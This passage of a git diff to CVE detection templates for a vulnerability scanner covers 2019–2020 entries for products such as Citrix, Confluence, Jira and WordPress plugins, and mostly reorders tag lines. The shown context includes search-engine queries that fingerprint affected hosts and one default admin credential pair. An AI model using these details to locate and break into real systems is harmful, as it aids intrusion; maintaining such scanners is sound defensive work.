+ tags: cve,cve2019,wpscan,wp,wordpress,wp-plugin,disclosure,popup-maker,auth-bypass,code-atlantic
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml
index dd845c014d..4209c988bd 100644
--- a/http/cves/2019/CVE-2019-17662.yaml
+++ b/http/cves/2019/CVE-2019-17662.yaml
@@ -29,7 +29,7 @@ info:
vendor: cybelsoft
product: thinvnc
shodan-query: http.favicon.hash:-1414548363
- tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive,cybelsoft
+ tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml
index 34a8782d35..7e8dccb5cb 100644
--- a/http/cves/2019/CVE-2019-1821.yaml
+++ b/http/cves/2019/CVE-2019-1821.yaml
@@ -25,7 +25,7 @@ info:
vendor: cisco
product: evolved_programmable_network_manager
shodan-query: http.title:"prime infrastructure"
- tags: packetstorm,cve,cve2019,rce,fileupload,unauth,intrusive,cisco
+ tags: cve,cve2019,packetstorm,rce,fileupload,unauth,intrusive,cisco
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml
index 90dee86243..34e2d0df4d 100644
--- a/http/cves/2019/CVE-2019-18818.yaml
+++ b/http/cves/2019/CVE-2019-18818.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: strapi
product: strapi
- tags: cve2019,strapi,auth-bypass,intrusive,edb,cve
+ tags: cve,cve2019,strapi,auth-bypass,intrusive,edb
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml
index 5c65e4d3ec..bd3a73989d 100644
--- a/http/cves/2019/CVE-2019-18922.yaml
+++ b/http/cves/2019/CVE-2019-18922.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: alliedtelesis
product: at-gs950\/8_firmware
- tags: packetstorm,seclists,allied,lfi,cve,cve2019,alliedtelesis
+ tags: cve,cve2019,packetstorm,seclists,allied,lfi,alliedtelesis
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml
index 31a33a596e..71ef6cca52 100644
--- a/http/cves/2019/CVE-2019-18957.yaml
+++ b/http/cves/2019/CVE-2019-18957.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: microstrategy
product: microstrategy_library
- tags: cve2019,microstrategy,packetstorm,xss,seclists,cve
+ tags: cve,cve2019,microstrategy,packetstorm,xss,seclists
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml
index fb8d51ac60..1b65302f63 100644
--- a/http/cves/2019/CVE-2019-19134.yaml
+++ b/http/cves/2019/CVE-2019-19134.yaml
@@ -28,7 +28,7 @@ info:
vendor: heroplugins
product: hero_maps_premium
framework: wordpress
- tags: wpscan,cve,cve2019,wordpress,xss,wp-plugin,maps,heroplugins
+ tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml
index 18c3de9b42..80ea4dec8c 100644
--- a/http/cves/2019/CVE-2019-19368.yaml
+++ b/http/cves/2019/CVE-2019-19368.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: maxum
product: rumpus
- tags: xss,ftp,packetstorm,cve,cve2019,maxum
+ tags: cve,cve2019,xss,ftp,packetstorm,maxum
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml
index f271323586..8048041574 100644
--- a/http/cves/2019/CVE-2019-1943.yaml
+++ b/http/cves/2019/CVE-2019-1943.yaml
@@ -30,7 +30,7 @@ info:
product: sg200-50_firmware
shodan-query: "/config/log_off_page.htm"
censys-query: "services.http.response.headers.location: /config/log_off_page.htm"
- tags: cve,cve2023,redirect,cisco
+ tags: cve,cve2019,redirect,cisco
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml
index 889bb14fbb..2c72defd00 100644
--- a/http/cves/2019/CVE-2019-19781.yaml
+++ b/http/cves/2019/CVE-2019-19781.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: citrix
product: application_delivery_controller_firmware
- tags: lfi,kev,packetstorm,cve,cve2019,citrix
+ tags: cve,cve2019,lfi,kev,packetstorm,citrix
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml
index 8434057f27..ca33ede3e6 100644
--- a/http/cves/2019/CVE-2019-19908.yaml
+++ b/http/cves/2019/CVE-2019-19908.yaml
@@ -29,7 +29,7 @@ info:
vendor: ciprianmp
product: phpmychat-plus
google-query: inurl:"/plus/pass_reset.php"
- tags: cve,cve2019,phpMyChat,xss,ciprianmp
+ tags: cve2019,cve,phpMyChat,xss,ciprianmp
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml
index 32ccd1fe46..11c2039b14 100644
--- a/http/cves/2019/CVE-2019-19985.yaml
+++ b/http/cves/2019/CVE-2019-19985.yaml
@@ -28,7 +28,7 @@ info:
vendor: icegram
product: email_subscribers_\&_newsletters
framework: wordpress
- tags: cve2019,wordpress,wp-plugin,edb,packetstorm,cve,icegram
+ tags: cve,cve2019,wordpress,wp-plugin,edb,packetstorm,icegram
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml
index 991859b559..83fae9730a 100644
--- a/http/cves/2019/CVE-2019-20141.yaml
+++ b/http/cves/2019/CVE-2019-20141.yaml
@@ -25,7 +25,7 @@ info:
vendor: laborator
product: neon
framework: wordpress
- tags: cve,cve2019,xss,laborator,wordpress
+ tags: cve2019,cve,xss,laborator,wordpress
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml
index 3eb7cd9740..8d7e78385d 100644
--- a/http/cves/2019/CVE-2019-20183.yaml
+++ b/http/cves/2019/CVE-2019-20183.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: employee_records_system_project
product: employee_records_system
- tags: edb,cve,cve2019,rce,fileupload,intrusive,employee_records_system_project
+ tags: cve,cve2019,edb,rce,fileupload,intrusive,employee_records_system_project
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml
index 233a427e71..e54350fdee 100644
--- a/http/cves/2019/CVE-2019-20210.yaml
+++ b/http/cves/2019/CVE-2019-20210.yaml
@@ -29,7 +29,7 @@ info:
vendor: cththemes
product: citybook
framework: wordpress
- tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss,cththemes
+ tags: cve,cve2019,wp-theme,wpscan,wordpress,citybook,xss,cththemes
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml
index 7fbc35b9de..d4151358e6 100644
--- a/http/cves/2019/CVE-2019-20224.yaml
+++ b/http/cves/2019/CVE-2019-20224.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: artica
product: pandora_fms
- tags: pandorafms,rce,cve,cve2019,authenticated,oast,artica
+ tags: cve,cve2019,pandorafms,rce,authenticated,oast,artica
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml
index 00a712f467..c4a0053414 100644
--- a/http/cves/2019/CVE-2019-20933.yaml
+++ b/http/cves/2019/CVE-2019-20933.yaml
@@ -28,7 +28,7 @@ info:
vendor: influxdata
product: influxdb
shodan-query: InfluxDB
- tags: unauth,db,influxdb,misconfig,influxdata
+ tags: cve,cve2019,unauth,db,influxdb,misconfig,influxdata
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml
index 855b59f1dd..ccdd51cbd3 100644
--- a/http/cves/2019/CVE-2019-2725.yaml
+++ b/http/cves/2019/CVE-2019-2725.yaml
@@ -26,7 +26,7 @@ info:
max-request: 2
vendor: oracle
product: agile_plm
- tags: packetstorm,kev,edb,cve,cve2019,oracle,weblogic,rce
+ tags: cve,cve2019,packetstorm,kev,edb,oracle,weblogic,rce
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml
index f891757e96..2781400a3a 100644
--- a/http/cves/2019/CVE-2019-2767.yaml
+++ b/http/cves/2019/CVE-2019-2767.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: oracle
product: bi_publisher
- tags: edb,cve,cve2019,oracle,xxe,oast
+ tags: cve,cve2019,edb,oracle,xxe,oast
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml
index 6a27ef1d8b..2f684d139e 100644
--- a/http/cves/2019/CVE-2019-3398.yaml
+++ b/http/cves/2019/CVE-2019-3398.yaml
@@ -28,7 +28,7 @@ info:
max-request: 5
vendor: atlassian
product: confluence
- tags: packetstorm,cve,cve2019,atlassian,confluence,rce,authenticated,intrusive,kev
+ tags: cve,cve2019,packetstorm,atlassian,confluence,rce,authenticated,intrusive,kev
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml
index 6051fc2d0f..f9fe421a86 100644
--- a/http/cves/2019/CVE-2019-3912.yaml
+++ b/http/cves/2019/CVE-2019-3912.yaml
@@ -25,7 +25,7 @@ info:
vendor: labkey
product: labkey_server
shodan-query: 'Server: Labkey'
- tags: tenable,cve,cve2019,redirect,labkey
+ tags: cve2019,cve,tenable,redirect,labkey
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml
index 2539d10f01..a2f51520c1 100644
--- a/http/cves/2019/CVE-2019-3929.yaml
+++ b/http/cves/2019/CVE-2019-3929.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: crestron
product: am-100_firmware
- tags: tenable,cve,cve2019,oast,injection,kev,edb,rce,packetstorm,crestron
+ tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron
http:
- method: POST
diff --git a/http/cves/2019/CVE-2019-5434.yaml b/http/cves/2019/CVE-2019-5434.yaml
index eead723ef8..3ec8c147ed 100644
--- a/http/cves/2019/CVE-2019-5434.yaml
+++ b/http/cves/2019/CVE-2019-5434.yaml
@@ -30,7 +30,7 @@ info:
vendor: revive-sas
product: revive_adserver
shodan-query: http.favicon.hash:106844876
- tags: edb,packetstorm,cve,cve2019,revive,adserver,rce,revive-sas
+ tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-6799.yaml b/http/cves/2019/CVE-2019-6799.yaml
index fc5ef89be7..1ad65c9394 100644
--- a/http/cves/2019/CVE-2019-6799.yaml
+++ b/http/cves/2019/CVE-2019-6799.yaml
@@ -32,7 +32,7 @@ info:
shodan-query: title:"phpmyadmin"
fofa-query: body="pma_servername" && body="4.8.4"
hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
- tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive
+ tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-7192.yaml b/http/cves/2019/CVE-2019-7192.yaml
index d6b0bbcb92..6c72422b9e 100644
--- a/http/cves/2019/CVE-2019-7192.yaml
+++ b/http/cves/2019/CVE-2019-7192.yaml
@@ -30,7 +30,7 @@ info:
vendor: qnap
product: photo_station
shodan-query: 'Content-Length: 580 "http server 1.0"'
- tags: packetstorm,cve,cve2019,lfi,rce,kev,qnap,qts
+ tags: cve,cve2019,packetstorm,lfi,rce,kev,qnap,qts,xss
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-7254.yaml b/http/cves/2019/CVE-2019-7254.yaml
index ad2a4b4cd4..ea712afe31 100644
--- a/http/cves/2019/CVE-2019-7254.yaml
+++ b/http/cves/2019/CVE-2019-7254.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: nortekcontrol
product: linear_emerge_essential_firmware
- tags: emerge,lfi,edb,packetstorm,cve,cve2019,nortekcontrol
+ tags: cve,cve2019,emerge,lfi,edb,packetstorm,nortekcontrol
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-7255.yaml b/http/cves/2019/CVE-2019-7255.yaml
index 118d50779e..bd18530adf 100644
--- a/http/cves/2019/CVE-2019-7255.yaml
+++ b/http/cves/2019/CVE-2019-7255.yaml
@@ -29,7 +29,7 @@ info:
vendor: nortekcontrol
product: linear_emerge_essential_firmware
shodan-query: http.title:"eMerge"
- tags: emerge,xss,packetstorm,cve,cve2019,nortek,nortekcontrol
+ tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-8449.yaml b/http/cves/2019/CVE-2019-8449.yaml
index 999265ae02..847fa22a16 100644
--- a/http/cves/2019/CVE-2019-8449.yaml
+++ b/http/cves/2019/CVE-2019-8449.yaml
@@ -26,7 +26,7 @@ info:
vendor: atlassian
product: jira
shodan-query: http.component:"Atlassian Jira"
- tags: atlassian,jira,disclosure,packetstorm,cve,cve2019
+ tags: cve,cve2019,atlassian,jira,disclosure,packetstorm
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-8451.yaml b/http/cves/2019/CVE-2019-8451.yaml
index 1359fa24b8..b290722b78 100644
--- a/http/cves/2019/CVE-2019-8451.yaml
+++ b/http/cves/2019/CVE-2019-8451.yaml
@@ -27,7 +27,7 @@ info:
vendor: atlassian
product: jira_server
shodan-query: http.component:"Atlassian Jira"
- tags: atlassian,jira,ssrf,oast,tenable,hackerone,cve,cve2019
+ tags: cve,cve2019,atlassian,jira,ssrf,oast,tenable,hackerone
http:
- method: POST
diff --git a/http/cves/2019/CVE-2019-8903.yaml b/http/cves/2019/CVE-2019-8903.yaml
index e70a27a5a3..7a1f0dc640 100644
--- a/http/cves/2019/CVE-2019-8903.yaml
+++ b/http/cves/2019/CVE-2019-8903.yaml
@@ -27,7 +27,7 @@ info:
vendor: totaljs
product: total.js
framework: node.js
- tags: cve,cve2019,totaljs,lfi,node.js
+ tags: cve2019,cve,totaljs,lfi,node.js
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-8937.yaml b/http/cves/2019/CVE-2019-8937.yaml
index 367d39182b..29e53839f2 100644
--- a/http/cves/2019/CVE-2019-8937.yaml
+++ b/http/cves/2019/CVE-2019-8937.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: digitaldruid
product: hoteldruid
- tags: packetstorm,cve,cve2019,xss,hoteldruid,edb,digitaldruid
+ tags: cve2019,cve,packetstorm,xss,hoteldruid,edb,digitaldruid
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-9618.yaml b/http/cves/2019/CVE-2019-9618.yaml
index c7e174c99b..5ba804fc6d 100644
--- a/http/cves/2019/CVE-2019-9618.yaml
+++ b/http/cves/2019/CVE-2019-9618.yaml
@@ -26,7 +26,7 @@ info:
vendor: gracemedia_media_player_project
product: gracemedia_media_player
framework: wordpress
- tags: wordpress,wp-plugin,lfi,seclists,edb,cve,cve2019,gracemedia_media_player_project
+ tags: cve,cve2019,wordpress,wp-plugin,lfi,seclists,edb,gracemedia_media_player_project
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-9726.yaml b/http/cves/2019/CVE-2019-9726.yaml
index a338f72c45..08322376af 100644
--- a/http/cves/2019/CVE-2019-9726.yaml
+++ b/http/cves/2019/CVE-2019-9726.yaml
@@ -24,7 +24,7 @@ info:
max-request: 1
vendor: eq-3
product: ccu3_firmware
- tags: cve,cve2019,homematic,lfi,eq-3
+ tags: cve2019,cve,homematic,lfi,eq-3
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-9733.yaml b/http/cves/2019/CVE-2019-9733.yaml
index e19202b6ed..37ebf886f7 100644
--- a/http/cves/2019/CVE-2019-9733.yaml
+++ b/http/cves/2019/CVE-2019-9733.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: jfrog
product: artifactory
- tags: packetstorm,cve,cve2019,artifactory,login,jfrog
+ tags: cve,cve2019,packetstorm,artifactory,login,jfrog
http:
- raw:
diff --git a/http/cves/2019/CVE-2019-9922.yaml b/http/cves/2019/CVE-2019-9922.yaml
index d1ea575d6e..578546913b 100644
--- a/http/cves/2019/CVE-2019-9922.yaml
+++ b/http/cves/2019/CVE-2019-9922.yaml
@@ -26,7 +26,7 @@ info:
vendor: harmistechnology
product: je_messenger
framework: joomla\!
- tags: cve,cve2019,joomla,messenger,lfi,harmistechnology,joomla\!
+ tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\!
http:
- method: GET
diff --git a/http/cves/2019/CVE-2019-9955.yaml b/http/cves/2019/CVE-2019-9955.yaml
index 6c2fc36800..842408d059 100644
--- a/http/cves/2019/CVE-2019-9955.yaml
+++ b/http/cves/2019/CVE-2019-9955.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: zyxel
product: atp200_firmware
- tags: zyxel,packetstorm,seclists,edb,cve,cve2019,xss
+ tags: cve,cve2019,zyxel,packetstorm,seclists,edb,xss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-0618.yaml b/http/cves/2020/CVE-2020-0618.yaml
index 98f40f0ed5..749b119d2b 100644
--- a/http/cves/2020/CVE-2020-0618.yaml
+++ b/http/cves/2020/CVE-2020-0618.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: microsoft
product: sql_server
- tags: cve2020,rce,packetstorm,cve,microsoft
+ tags: cve,cve2020,rce,packetstorm,microsoft
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-10148.yaml b/http/cves/2020/CVE-2020-10148.yaml
index 271fb23d30..cb1b0baec0 100644
--- a/http/cves/2020/CVE-2020-10148.yaml
+++ b/http/cves/2020/CVE-2020-10148.yaml
@@ -28,7 +28,7 @@ info:
max-request: 2
vendor: solarwinds
product: orion_platform
- tags: cve,cve2020,solarwinds,rce,auth-bypass,kev
+ tags: cve2020,cve,solarwinds,rce,auth-bypass,kev
variables:
string: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/cves/2020/CVE-2020-10199.yaml b/http/cves/2020/CVE-2020-10199.yaml
index dd7047555f..208b477229 100644
--- a/http/cves/2020/CVE-2020-10199.yaml
+++ b/http/cves/2020/CVE-2020-10199.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: sonatype
product: nexus
- tags: packetstorm,cve,cve2020,sonatype,nexus,rce,kev
+ tags: cve2020,cve,packetstorm,sonatype,nexus,rce,kev
variables:
username: admin
password: admin123
diff --git a/http/cves/2020/CVE-2020-10220.yaml b/http/cves/2020/CVE-2020-10220.yaml
index 58aa6fac33..faba59cf08 100644
--- a/http/cves/2020/CVE-2020-10220.yaml
+++ b/http/cves/2020/CVE-2020-10220.yaml
@@ -30,7 +30,7 @@ info:
vendor: rconfig
product: rconfig
shodan-query: title:"rConfig"
- tags: packetstorm,cve,cve2020,rconfig,sqli
+ tags: cve,cve2020,packetstorm,rconfig,sqli
variables:
num: "999999999"
diff --git a/http/cves/2020/CVE-2020-10546.yaml b/http/cves/2020/CVE-2020-10546.yaml
index c8307a8564..e867ee9760 100644
--- a/http/cves/2020/CVE-2020-10546.yaml
+++ b/http/cves/2020/CVE-2020-10546.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: rconfig
product: rconfig
- tags: cve,cve2020,rconfig,sqli
+ tags: cve2020,cve,rconfig,sqli
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-10770.yaml b/http/cves/2020/CVE-2020-10770.yaml
index e72d83a571..36a6e766d9 100644
--- a/http/cves/2020/CVE-2020-10770.yaml
+++ b/http/cves/2020/CVE-2020-10770.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: redhat
product: keycloak
- tags: keycloak,ssrf,oast,cve,cve2020,blind,packetstorm,edb,redhat
+ tags: cve,cve2020,keycloak,ssrf,oast,blind,packetstorm,edb,redhat
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11110.yaml b/http/cves/2020/CVE-2020-11110.yaml
index 1d1709dbdc..0d8bf6345f 100644
--- a/http/cves/2020/CVE-2020-11110.yaml
+++ b/http/cves/2020/CVE-2020-11110.yaml
@@ -27,7 +27,7 @@ info:
vendor: grafana
product: grafana
shodan-query: title:"Grafana"
- tags: cve,cve2020,xss,grafana,hackerone
+ tags: cve2020,cve,xss,grafana,hackerone
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-11450.yaml b/http/cves/2020/CVE-2020-11450.yaml
index e0b027ed62..124aec25dc 100644
--- a/http/cves/2020/CVE-2020-11450.yaml
+++ b/http/cves/2020/CVE-2020-11450.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: microstrategy
product: microstrategy_web
- tags: packetstorm,seclists,microstrategy,exposure,jvm,config,cve,cve2020
+ tags: cve2020,cve,packetstorm,seclists,microstrategy,exposure,jvm,config,xss
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11455.yaml b/http/cves/2020/CVE-2020-11455.yaml
index 30cd46d109..99c842feec 100644
--- a/http/cves/2020/CVE-2020-11455.yaml
+++ b/http/cves/2020/CVE-2020-11455.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: limesurvey
product: limesurvey
- tags: cve2020,lfi,edb,packetstorm,cve,limesurvey
+ tags: cve2020,cve,lfi,edb,packetstorm,limesurvey
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11529.yaml b/http/cves/2020/CVE-2020-11529.yaml
index 3375043293..78c348696b 100644
--- a/http/cves/2020/CVE-2020-11529.yaml
+++ b/http/cves/2020/CVE-2020-11529.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: getgrav
product: grav
- tags: cve,cve2020,redirect,grav,getgrav
+ tags: cve2020,cve,redirect,grav,getgrav
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11530.yaml b/http/cves/2020/CVE-2020-11530.yaml
index 5b9a607735..dce12d0607 100644
--- a/http/cves/2020/CVE-2020-11530.yaml
+++ b/http/cves/2020/CVE-2020-11530.yaml
@@ -30,7 +30,7 @@ info:
vendor: idangero
product: chop_slider
framework: wordpress
- tags: wpscan,seclists,cve,cve2020,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
+ tags: cve,cve2020,wpscan,seclists,sqli,wordpress,wp-plugin,wp,chopslider,unauth,idangero
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-11547.yaml b/http/cves/2020/CVE-2020-11547.yaml
index 71e21c7f7a..0bb52a66d0 100644
--- a/http/cves/2020/CVE-2020-11547.yaml
+++ b/http/cves/2020/CVE-2020-11547.yaml
@@ -27,7 +27,7 @@ info:
vendor: paessler
product: "prtg_network_monitor"
shodan-query: title:"prtg"
- tags: cve,cve2020,prtg,disclosure,paessler
+ tags: cve2020,cve,prtg,disclosure,paessler
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11738.yaml b/http/cves/2020/CVE-2020-11738.yaml
index bf793cd350..1c31689dfe 100644
--- a/http/cves/2020/CVE-2020-11738.yaml
+++ b/http/cves/2020/CVE-2020-11738.yaml
@@ -31,7 +31,7 @@ info:
vendor: snapcreek
product: duplicator
framework: wordpress
- tags: kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi,snapcreek
+ tags: cve,cve2020,kev,tenable,packetstorm,wordpress,wp-plugin,lfi,snapcreek
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11798.yaml b/http/cves/2020/CVE-2020-11798.yaml
index ea3b44b2ef..75752cc24e 100644
--- a/http/cves/2020/CVE-2020-11798.yaml
+++ b/http/cves/2020/CVE-2020-11798.yaml
@@ -30,7 +30,7 @@ info:
vendor: mitel
product: micollab_audio\,_web_\&_video_conferencing
shodan-query: html:"Mitel" html:"MiCollab"
- tags: packetstorm,cve,cve2020,mitel,micollab,lfi
+ tags: cve,cve2020,packetstorm,mitel,micollab,lfi
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11853.yaml b/http/cves/2020/CVE-2020-11853.yaml
index 12960bb425..943c507d90 100644
--- a/http/cves/2020/CVE-2020-11853.yaml
+++ b/http/cves/2020/CVE-2020-11853.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: microfocus
product: operation_bridge_manager
- tags: opm,rce,packetstorm,cve,cve2020,microfocus
+ tags: cve,cve2020,opm,rce,packetstorm,microfocus
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11854.yaml b/http/cves/2020/CVE-2020-11854.yaml
index 90d99fc8a0..a617320ae7 100644
--- a/http/cves/2020/CVE-2020-11854.yaml
+++ b/http/cves/2020/CVE-2020-11854.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: microfocus
product: application_performance_management
- tags: microfocus,packetstorm,cve,cve2020,ucmdb,rce
+ tags: cve2020,cve,microfocus,packetstorm,ucmdb,rce
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11930.yaml b/http/cves/2020/CVE-2020-11930.yaml
index 9e02c7ae18..5a5afdde05 100644
--- a/http/cves/2020/CVE-2020-11930.yaml
+++ b/http/cves/2020/CVE-2020-11930.yaml
@@ -28,7 +28,7 @@ info:
product: translate_wordpress_with_gtranslate
framework: wordpress
publicwww-query: "/wp-content/plugins/gtranslate"
- tags: cve,cve2020,wordpress,wp,xss,wp-plugin,wpscan,gtranslate
+ tags: cve2020,cve,wordpress,wp,xss,wp-plugin,wpscan,gtranslate
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-11978.yaml b/http/cves/2020/CVE-2020-11978.yaml
index d52bb3ec5b..4208e12f2e 100644
--- a/http/cves/2020/CVE-2020-11978.yaml
+++ b/http/cves/2020/CVE-2020-11978.yaml
@@ -28,7 +28,7 @@ info:
vendor: apache
product: airflow
shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs"
- tags: packetstorm,cve,cve2020,apache,airflow,rce,kev
+ tags: cve2020,cve,packetstorm,apache,airflow,rce,kev
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-12054.yaml b/http/cves/2020/CVE-2020-12054.yaml
index 73a55cf927..101f2f55eb 100644
--- a/http/cves/2020/CVE-2020-12054.yaml
+++ b/http/cves/2020/CVE-2020-12054.yaml
@@ -28,7 +28,7 @@ info:
vendor: catchplugins
product: catch_breadcrumb
framework: wordpress
- tags: wordpress,xss,wp-plugin,wpscan,cve,cve2020,catchplugins
+ tags: cve,cve2020,wordpress,xss,wp-plugin,wpscan,catchplugins
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-12124.yaml b/http/cves/2020/CVE-2020-12124.yaml
index 25b7a7cb8c..c314033273 100644
--- a/http/cves/2020/CVE-2020-12124.yaml
+++ b/http/cves/2020/CVE-2020-12124.yaml
@@ -21,7 +21,7 @@ info:
metadata:
vendor: wavlink
product: wn530h4_firmware
- tags: cve,cve2020,rce,wavlink
+ tags: cve2020,cve,rce,wavlink
variables:
str: "{{rand_base(3)}}"
diff --git a/http/cves/2020/CVE-2020-12259.yaml b/http/cves/2020/CVE-2020-12259.yaml
index 4221612421..acaed2d131 100644
--- a/http/cves/2020/CVE-2020-12259.yaml
+++ b/http/cves/2020/CVE-2020-12259.yaml
@@ -24,7 +24,7 @@ info:
vendor: rconfig
product: rconfig
shodan-query: http.title:"rConfig"
- tags: cve,cve2020,rconfig,authenticated,xss
+ tags: cve2020,cve,rconfig,authenticated,xss
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-12478.yaml b/http/cves/2020/CVE-2020-12478.yaml
index 37c9427179..3485d32a13 100644
--- a/http/cves/2020/CVE-2020-12478.yaml
+++ b/http/cves/2020/CVE-2020-12478.yaml
@@ -27,7 +27,7 @@ info:
vendor: teampass
product: teampass
shodan-query: http.html:"teampass"
- tags: cve,cve2020,teampass,exposure,unauth
+ tags: cve2020,cve,teampass,exposure,unauth
http:
- method: GET
diff --git a/http/cves/2020/CVE-2020-12720.yaml b/http/cves/2020/CVE-2020-12720.yaml
index 9133593ec2..2833d840cd 100644
--- a/http/cves/2020/CVE-2020-12720.yaml
+++ b/http/cves/2020/CVE-2020-12720.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: vbulletin
product: vbulletin
- tags: cve2020,vbulletin,sqli,packetstorm,cve
+ tags: cve2020,cve,vbulletin,sqli,packetstorm
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-12800.yaml b/http/cves/2020/CVE-2020-12800.yaml
index b6fdebf4c8..025d8bc650 100644
--- a/http/cves/2020/CVE-2020-12800.yaml
+++ b/http/cves/2020/CVE-2020-12800.yaml
@@ -28,7 +28,7 @@ info:
vendor: codedropz
product: drag_and_drop_multiple_file_upload_-_contact_form_7
framework: wordpress
- tags: wordpress,wp-plugin,fileupload,wp,rce,packetstorm,cve,cve2020,intrusive,codedropz
+ tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz
http:
- raw:
diff --git a/http/cves/2020/CVE-2020-13167.yaml b/http/cves/2020/CVE-2020-13167.yaml
index 1c1db3662f..604491ff14 100644
